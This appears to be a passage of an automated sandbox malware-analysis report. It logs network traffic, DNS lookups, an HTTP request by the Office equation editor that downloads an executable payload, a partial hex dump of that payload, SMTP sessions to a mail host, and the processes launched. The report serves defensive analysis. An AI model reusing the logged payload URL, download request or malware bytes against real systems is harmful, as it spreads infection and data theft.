Feb 8, 2021 06:40:40.786376953 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.787519932 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:40.975235939 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.978287935 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:40.979155064 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.166927099 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.169012070 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.169790030 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.357507944 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.400357008 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.401070118 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.588773966 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.589374065 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.590343952 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.590850115 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.591128111 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.591419935 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.598674059 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.778157949 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.778369904 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.778466940 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.778820038 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.779004097 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.779122114 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.786541939 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.786710024 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.966435909 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.966718912 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.966819048 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.966896057 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:41.975851059 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:41.976022959 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.156959057 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.157073975 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.157478094 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.157562017 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.166105032 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.166207075 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.166430950 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.166523933 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.347105026 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.347150087 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.347376108 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.347583055 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.347656012 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.348066092 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.356470108 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.356493950 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.356503010 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.356633902 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.356739998 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.356921911 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.356992960 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.535164118 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.535378933 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.535533905 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.535636902 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.535687923 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.535703897 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.535722017 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.535799026 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.536075115 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.536183119 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.536290884 CET	49171	587	192.168.2.22	198.54.122.60
Feb 8, 2021 06:40:42.544250965 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544280052 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544287920 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544393063 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544408083 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544415951 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.544547081 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723233938 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723313093 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723364115 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723409891 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723454952 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723567009 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723678112 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.723736048 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.732008934 CET	587	49171	198.54.122.60	192.168.2.22
Feb 8, 2021 06:40:42.935877085 CET	49171	587	192.168.2.22	198.54.122.60

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2021 06:39:00.584810972 CET	52197	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:39:00.641642094 CET	53	52197	8.8.8.8	192.168.2.22
Feb 8, 2021 06:39:00.641947031 CET	52197	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:39:00.931087971 CET	53	52197	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:06.525257111 CET	53099	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:06.585745096 CET	53	53099	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:08.445689917 CET	52838	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:08.494725943 CET	53	52838	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:08.508382082 CET	61200	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:08.562246084 CET	53	61200	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:08.562980890 CET	61200	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:08.616954088 CET	53	61200	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:15.009102106 CET	49548	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:15.073489904 CET	53	49548	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:15.074227095 CET	49548	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:15.138760090 CET	53	49548	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:23.470118999 CET	55627	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:23.518940926 CET	53	55627	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:23.519524097 CET	55627	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:23.568533897 CET	53	55627	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:33.211690903 CET	56009	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:33.273438931 CET	53	56009	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:39.340425968 CET	61865	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:39.392028093 CET	53	61865	8.8.8.8	192.168.2.22
Feb 8, 2021 06:40:39.392992973 CET	61865	53	192.168.2.22	8.8.8.8
Feb 8, 2021 06:40:39.444483042 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 8, 2021 06:39:00.584810972 CET	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:39:00.641947031 CET	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:06.525257111 CET	192.168.2.22	8.8.8.8	0xa912	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:15.009102106 CET	192.168.2.22	8.8.8.8	0xa89d	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:15.074227095 CET	192.168.2.22	8.8.8.8	0xa89d	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:23.470118999 CET	192.168.2.22	8.8.8.8	0xb880	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:23.519524097 CET	192.168.2.22	8.8.8.8	0xb880	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:33.211690903 CET	192.168.2.22	8.8.8.8	0xdb0e	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:39.340425968 CET	192.168.2.22	8.8.8.8	0x12e4	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:39.392992973 CET	192.168.2.22	8.8.8.8	0x12e4	Standard query (0)	mail.privateemail.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 8, 2021 06:39:00.641642094 CET	8.8.8.8	192.168.2.22	0xfc39	No error (0)	globalteamacademy.com	43.252.37.193	A (IP address)	IN (0x0001)
Feb 8, 2021 06:39:00.931087971 CET	8.8.8.8	192.168.2.22	0xfc39	No error (0)	globalteamacademy.com	43.252.37.193	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:06.585745096 CET	8.8.8.8	192.168.2.22	0xa912	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:15.073489904 CET	8.8.8.8	192.168.2.22	0xa89d	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:15.138760090 CET	8.8.8.8	192.168.2.22	0xa89d	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:23.518940926 CET	8.8.8.8	192.168.2.22	0xb880	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:23.568533897 CET	8.8.8.8	192.168.2.22	0xb880	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:33.273438931 CET	8.8.8.8	192.168.2.22	0xdb0e	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:39.392028093 CET	8.8.8.8	192.168.2.22	0x12e4	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)
Feb 8, 2021 06:40:39.444483042 CET	8.8.8.8	192.168.2.22	0x12e4	No error (0)	mail.privateemail.com	198.54.122.60	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

globalteamacademy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 8, 2021 06:39:01.151515961 CET	0	OUT	GET /showcase/bill/6vWjC1g7qA0Z76f.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: globalteamacademy.com Connection: Keep-Alive
Feb 8, 2021 06:39:01.365443945 CET	2	IN	HTTP/1.1 200 OK Date: Mon, 08 Feb 2021 05:39:02 GMT Server: Apache Last-Modified: Sun, 07 Feb 2021 21:36:33 GMT Accept-Ranges: bytes Content-Length: 1377280 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 5b 20 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 fa 14 00 00 08 00 00 00 00 00 00 4e 18 15 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 17 15 00 53 00 00 00 00 20 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 f8 14 00 00 20 00 00 00 fa 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 20 15 00 00 06 00 00 00 fc 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 02 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 18 15 00 00 00 00 00 48 00 00 00 02 00 05 00 38 8a 11 00 c0 8d 03 00 03 00 00 00 01 00 00 06 10 a3 04 00 28 e7 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 07 00 00 0a 00 02 16 28 08 00 00 0a 00 02 17 28 09 00 00 0a 00 02 17 28 0a 00 00 0a 00 02 16 28 0b 00 00 0a 00 2a 00 4e 00 02 28 09 00 00 06 6f 1a 00 00 06 28 0d 00 00 0a 00 2a 26 00 02 28 0f 00 00 0a 00 2a 00 00 ce 73 10 00 00 0a 80 01 00 00 04 73 11 00 00 0a 80 02 00 00 04 73 12 00 00 0a 80 03 00 00 04 73 13 00 00 0a 80 04 00 00 04 73 14 00 00 0a 80 05 00 00 04 2a 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 15 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 16 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 17 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 18 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 19 00 00 0a 0a 2b 00 06 2a 1b 30 05 00 ff 00 00 00 06 00 00 11 00 02 8c 06 00 00 1b 2c 0f 0f 00 fe 16 06 00 00 1b 6f 1e 00 00 0a 2b 01 17 0b 07 39 d8 00 00 00 7e 06 00 00 04 14 fe 03 0c 08 2c 32 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 6f 20 00 00 0a 0d 09 2c 16 72 01 00 00 70 16 8d 18 00 00 01 28 21 00 00 0a 73 22 00 00 0a 7a 00 00 2b 0c 00 73 23 00 00 0a 80 06 00 00 04 00 7e 06 00 00 04 d0 06 00 00 1b 28 1f 00 00 0a 14 6f 24 00 00 0a 00 00 28 01 00 00 2b 0a de 74 75 14 00 00 01 25 2d 04 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[ `N @ `@S @ H.textT `.rsrc @@.reloc@@B0H8(0(((o(((((N(o(&(sssss0~o+0~o+0~o+0~o+0~o+0,o+9~,2~(o ,rp(!s"z+s#~(o$(+tu%-
Feb 8, 2021 06:39:01.365494967 CET	3	IN	Data Raw: 26 16 2b 19 25 28 26 00 00 0a 13 04 11 04 6f 27 00 00 0a 14 fe 03 13 05 11 05 16 fe 03 fe 11 26 72 3b 00 00 70 17 8d 18 00 00 01 25 16 11 04 6f 27 00 00 0a 6f 28 00 00 0a a2 28 21 00 00 0a 13 06 11 06 11 04 6f 27 00 00 0a 73 29 00 00 0a 7a 00 7e Data Ascii: &+%(&o'&r;p%o'o((!o's)z~(o+1aZo+&(,0(-(.+0(/+0
Feb 8, 2021 06:39:01.365536928 CET	5	IN	Data Raw: 04 fe 01 2c 02 2b 1d 03 14 fe 03 2c 0b 72 71 00 00 70 73 31 00 00 0a 7a 02 02 7c 14 00 00 04 28 20 00 00 2b 2a ae 03 02 7b 15 00 00 04 fe 01 2c 02 2b 1d 03 14 fe 03 2c 0b 72 71 00 00 70 73 31 00 00 0a 7a 02 02 7c 15 00 00 04 28 21 00 00 2b 2a ae Data Ascii: ,+,rqps1z\|( +{,+,rqps1z\|(!+{,+,rqps1z\|("+{,+,rqps1z\|(#+0(-(.+0(/+0
Feb 8, 2021 06:39:01.365576982 CET	6	IN	Data Raw: 73 53 00 00 0a 6f 68 00 00 06 00 02 73 55 00 00 0a 6f 64 00 00 06 00 02 73 55 00 00 0a 6f 5a 00 00 06 00 02 73 55 00 00 0a 6f 5c 00 00 06 00 02 73 55 00 00 0a 6f 56 00 00 06 00 02 02 7b 20 00 00 04 73 56 00 00 0a 6f 58 00 00 06 00 02 73 55 00 00 Data Ascii: sSohsUodsUoZsUo\sUoV{ sVoXsUo^sUo`sUobsSojsSolsSonoQoWo{oXoooWosoWowoWoSoWocoXoYoX
Feb 8, 2021 06:39:01.365618944 CET	7	IN	Data Raw: 02 6f 79 00 00 06 72 b1 01 00 70 22 00 00 40 41 17 19 16 73 5a 00 00 0a 6f 5b 00 00 0a 00 02 6f 79 00 00 06 1f 0b 1f 0b 73 5c 00 00 0a 6f 5d 00 00 0a 00 02 6f 79 00 00 06 72 87 02 00 70 6f 5e 00 00 0a 00 02 6f 79 00 00 06 20 90 00 00 00 1f 13 73 Data Ascii: oyrp"@AsZo[oys\o]oyrpo^oy s_o`oyoaoyrpoboS(jodoSoeoeofoSoeogofoSoeocofoSoeoYofoSoe
Feb 8, 2021 06:39:01.365663052 CET	9	IN	Data Raw: 61 00 00 06 1f 52 1f 4b 73 5f 00 00 0a 6f 60 00 00 0a 00 02 6f 61 00 00 06 1f 0b 6f 68 00 00 0a 00 02 6f 61 00 00 06 16 6f 69 00 00 0a 00 02 6f 69 00 00 06 17 6f 59 00 00 0a 00 02 6f 69 00 00 06 72 b1 01 00 70 22 00 00 34 41 17 19 16 73 5a 00 00 Data Ascii: aRKs_o`oaohoaoioioYoirp"4AsZo[oic s\o]oirpo^oi s_o`oioaoirpobokoYokrp"4AsZo[ok
Feb 8, 2021 06:39:01.365712881 CET	10	IN	Data Raw: 06 73 4c 00 00 0a 0b 02 fe 06 87 00 00 06 73 4c 00 00 0a 0c 02 7b 26 00 00 04 0d 09 2c 15 09 06 6f 79 00 00 0a 09 07 6f 7b 00 00 0a 09 08 6f 7c 00 00 0a 02 03 7d 26 00 00 04 02 7b 26 00 00 04 0d 09 2c 15 09 06 6f 7a 00 00 0a 09 07 6f 4d 00 00 0a Data Ascii: sLsL{&,oyo{o\|}&{&,ozoMo}&{'+0msLsLsL{',oyo{o\|}'{',ozoMo}&{(+0
Feb 8, 2021 06:39:01.365757942 CET	12	IN	Data Raw: 0d 09 2c 15 09 06 6f 7b 00 00 0a 09 07 6f 7c 00 00 0a 09 08 6f 7f 00 00 0a 02 03 7d 35 00 00 04 02 7b 35 00 00 04 0d 09 2c 15 09 06 6f 4d 00 00 0a 09 07 6f 7d 00 00 0a 09 08 6f 80 00 00 0a 2a 00 00 00 26 02 7b 36 00 00 04 2b 00 2a 00 00 13 30 02 Data Ascii: ,o{o\|o}5{5,oMo}o&{6+0msLsLsL{6,oyo{o\|}6{6,ozoMo}&{7+"}7*f((o
Feb 8, 2021 06:39:01.365802050 CET	13	IN	Data Raw: 0a 00 2a 00 00 4e 00 02 6f 73 00 00 06 28 8a 00 00 0a 6f 64 00 00 0a 00 2a 4e 00 02 6f 73 00 00 06 28 63 00 00 0a 6f 64 00 00 0a 00 2a 66 00 02 28 81 00 00 0a 00 28 09 00 00 06 6f 1c 00 00 06 6f 82 00 00 0a 00 2a 00 00 66 00 02 28 81 00 00 0a 00 Data Ascii: Nos(odNos(codf((oof((ooNoo(odNoo(cod**~(KsL(N(01,{=+,{=oO(P*
Feb 8, 2021 06:39:01.365844965 CET	15	IN	Data Raw: 04 00 70 28 5e 00 00 0a 00 02 17 28 74 00 00 0a 00 02 72 8b 04 00 70 6f 75 00 00 0a 00 02 6f a9 00 00 06 6f 78 00 00 0a 00 02 6f ab 00 00 06 16 6f 76 00 00 0a 00 02 6f ab 00 00 06 6f 77 00 00 0a 00 02 6f b1 00 00 06 6f 78 00 00 0a 00 02 16 28 76 Data Ascii: p(^(trpouooxoovoowoox(v&{>+07sL{>,oy}>{>,oz&{?+07s{?,o}?{?,o
Feb 8, 2021 06:39:01.570548058 CET	16	IN	Data Raw: 0a 6f 16 01 00 06 00 02 73 8c 00 00 0a 6f 18 01 00 06 00 02 73 8c 00 00 0a 6f 1a 01 00 06 00 02 73 8c 00 00 0a 6f 1c 01 00 06 00 02 73 8c 00 00 0a 6f 1e 01 00 06 00 02 73 8c 00 00 0a 6f 20 01 00 06 00 02 73 8c 00 00 0a 6f 22 01 00 06 00 02 73 8c Data Ascii: osososososo so"so$so&so(so*so,so.so0so2so4so6so8so:so<so>

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 8, 2021 06:40:07.000910997 CET	587	49166	198.54.122.60	192.168.2.22	220 PrivateEmail.com prod Mail Node
Feb 8, 2021 06:40:07.001544952 CET	49166	587	192.168.2.22	198.54.122.60	EHLO 841618
Feb 8, 2021 06:40:07.192585945 CET	587	49166	198.54.122.60	192.168.2.22	250-mta-14.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 06:40:07.192898989 CET	49166	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 06:40:07.384181976 CET	587	49166	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 06:40:15.519993067 CET	587	49168	198.54.122.60	192.168.2.22	220 PrivateEmail.com prod Mail Node
Feb 8, 2021 06:40:15.521085024 CET	49168	587	192.168.2.22	198.54.122.60	EHLO 841618
Feb 8, 2021 06:40:15.711292028 CET	587	49168	198.54.122.60	192.168.2.22	250-mta-14.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 06:40:15.711941957 CET	49168	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 06:40:15.900330067 CET	587	49168	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 06:40:23.948702097 CET	587	49169	198.54.122.60	192.168.2.22	220 PrivateEmail.com prod Mail Node
Feb 8, 2021 06:40:23.949331999 CET	49169	587	192.168.2.22	198.54.122.60	EHLO 841618
Feb 8, 2021 06:40:24.138158083 CET	587	49169	198.54.122.60	192.168.2.22	250-mta-14.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 06:40:24.138598919 CET	49169	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 06:40:24.328649044 CET	587	49169	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 06:40:33.658427954 CET	587	49170	198.54.122.60	192.168.2.22	220 PrivateEmail.com prod Mail Node
Feb 8, 2021 06:40:33.658946991 CET	49170	587	192.168.2.22	198.54.122.60	EHLO 841618
Feb 8, 2021 06:40:33.849428892 CET	587	49170	198.54.122.60	192.168.2.22	250-mta-14.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 06:40:33.849714994 CET	49170	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 06:40:34.039834023 CET	587	49170	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 8, 2021 06:40:39.824616909 CET	587	49171	198.54.122.60	192.168.2.22	220 PrivateEmail.com prod Mail Node
Feb 8, 2021 06:40:39.824884892 CET	49171	587	192.168.2.22	198.54.122.60	EHLO 841618
Feb 8, 2021 06:40:40.012923956 CET	587	49171	198.54.122.60	192.168.2.22	250-mta-14.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 8, 2021 06:40:40.013355970 CET	49171	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 8, 2021 06:40:40.201142073 CET	587	49171	198.54.122.60	192.168.2.22	220 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2032 Parent PID: 584

General

Start time:	06:38:33
Start date:	08/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13ff10000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1692 Parent PID: 584

General

Start time:	06:38:34
Start date:	08/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegAsmbvbvcrtyjgh.exe PID: 260 Parent PID: 1692

General

Start time:	06:39:05
Start date:	08/02/2021
Path:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Imagebase:	0xa50000
File size:	1377280 bytes
